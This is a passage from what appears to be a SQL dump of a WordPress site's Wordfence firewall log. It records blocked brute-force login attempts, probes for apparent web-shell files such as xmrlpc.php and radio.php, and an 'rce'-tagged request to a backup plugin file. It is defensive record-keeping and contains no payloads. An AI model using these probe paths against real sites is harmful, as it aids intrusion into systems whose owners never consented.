User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15703,1705029126.120951,1705029126.035100,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/css/colors/blue/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS94bXJscGMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15699,0.000000,1705026801.118633,'\0\0\0\0\0\0\0\0\0\0]Z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15700,0.000000,1705028120.476211,'\0\0\0\0\0\0\0\0\0\0WE',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15701,0.000000,1705028188.853255,'\0\0\0\0\0\0\0\0\0\0K*',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15702,1705029131.828234,1705029131.752600,'\0\0\0\0\0\0\0\0\0\0 ',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15697,1705024868.838160,1705024868.764500,'\0\0\0\0\0\0\0\0\0\0]Z',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/aioseoextensions/aioseoextensions.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haW9zZW9leHRlbnNpb25zL2Fpb3Nlb2V4dGVuc2lvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15695,0.000000,1705024130.525753,'&\0\0Fp\0\0\0\0\0\0\0.',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15696,0.000000,1705024445.239841,'\0\0\0\0\0\0\0\0\0\0[9s',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15734,1705042541.623079,1705042541.550900,'\0\0\0\0\0\0\0\0\0\0&\r}',0,403,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'python-requests/2.28.1','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15732,0.000000,1705041238.236975,'$\0a\0\0\0\0\0\0z ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15698,0.000000,1705024891.773745,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15648,0.000000,1704994318.741139,' A\0O\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15649,0.000000,1704994522.236046,'\0\0\0\0\0\0\0\0\0\0b3a',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15650,1704994950.276507,1704994950.199100,'\0\0\0\0\0\0\0\0\0\0b3a',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15651,0.000000,1704995391.486209,'\0\0\0\0\0\0\0\0\0\0ޡ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15652,0.000000,1704995461.557470,'\0\0\0\0\0\0\0\0\0\0R\\',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15653,0.000000,1704996275.124260,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15654,0.000000,1704997115.533787,'\0\0\0\0\0\0\0\0\0\0Y(7',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15657,0.000000,1704999576.787456,'\0\0\0\0\0\0\0\0\0\0<',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15647,1704993557.543107,1704993557.440700,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15655,0.000000,1704998285.912345,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15656,0.000000,1704998739.584751,'\0\0\0\0\0\0\0\0\0\0ٵ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15658,0.000000,1704999758.932487,'\0\0\0\0\0\0\0\0\0\0PzX',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15659,0.000000,1705002021.742817,'*\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15660,0.000000,1705002088.928043,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15661,0.000000,1705002664.770972,' A%E\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15646,1704993563.211631,1704993563.146300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15662,1705002776.562494,1705002776.512900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/radio.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15645,1704993570.714636,1704993570.649300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15679,0.000000,1705012274.891531,'\0\0\0\0\0\0\0\0\0\0t',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15674,1705009034.180886,1705009034.092700,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15663,1705002771.692424,1705002771.638300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15678,0.000000,1705011804.483223,'*\0\0\0\0\"',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15677,0.000000,1705011740.586674,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15644,1704993576.321985,1704993576.249000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/radio.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15681,0.000000,1705013588.968741,'*\"\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:41.0) Gecko/20100101 Firefox/41.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15664,1705002765.393136,1705002765.336700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15387,0.000000,1704903958.325845,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15388,0.000000,1704903958.337753,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15389,1704904430.143264,1704904430.038200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15366,1704900847.900495,1704900847.840900,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15390,1704904430.136600,1704904430.041100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15391,0.000000,1704904900.303629,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15392,0.000000,1704904900.312591,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15364,0.000000,1704900201.019404,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15365,1704900848.425374,1704900848.341300,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15360,0.000000,1704899677.921882,'\0\0\0\0\0\0\0\0\0\0[\\',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(15361,0.000000,1704899677.882569,'\0\0\0\0\0\0\0\0\0\0[\\',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(15362,0.000000,1704900142.721800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15363,0.000000,1704900142.808932,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15359,1704899221.373548,1704899221.287900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15358,1704899221.383347,1704899221.275900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15353,1704898292.130263,1704898292.036700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15354,0.000000,1704898752.784638,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15355,0.000000,1704898752.778987,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15356,0.000000,1704898894.129124,'*\0@\0\0\0\0\0\0Im',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15357,0.000000,1704899212.511712,'\0\0\0\0\0\0\0\0\0\0t',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15347,1704897376.254413,1704897376.149700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15348,0.000000,1704897404.277516,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15349,0.000000,1704897837.135882,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security 